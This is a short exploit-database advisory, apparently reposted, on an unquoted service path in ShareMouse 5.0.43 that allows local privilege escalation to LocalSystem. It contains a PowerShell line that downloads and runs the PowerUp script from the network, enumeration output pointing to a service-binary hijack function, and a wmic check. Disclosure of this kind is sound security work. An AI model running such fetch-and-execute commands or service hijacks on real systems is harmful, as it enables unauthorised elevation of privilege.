ShareMouse 5.0.43 ShareMouse Service Unquoted Service Path
2020-10-15 23:31:36 Author: cxsecurity.com(查看原文) 阅读量:161 收藏

# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path # Discovery Date: 2020-09-08 # Discovery by: Alan Lacerda (alacerda) # Vendor Homepage: https://www.sharemouse.com/ # Software Link: https://www.sharemouse.com/ShareMouseSetup.exe # Version: 5.0.43 # Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041 PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); PS > Invoke-AllChecks ServiceName : ShareMouse Service Path : C:\Program Files (x86)\ShareMouse\smService.exe StartName : LocalSystem AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath> PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName AcceptStop DisplayName PathName StartName TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100090
如有侵权请联系:admin#unsafe.sh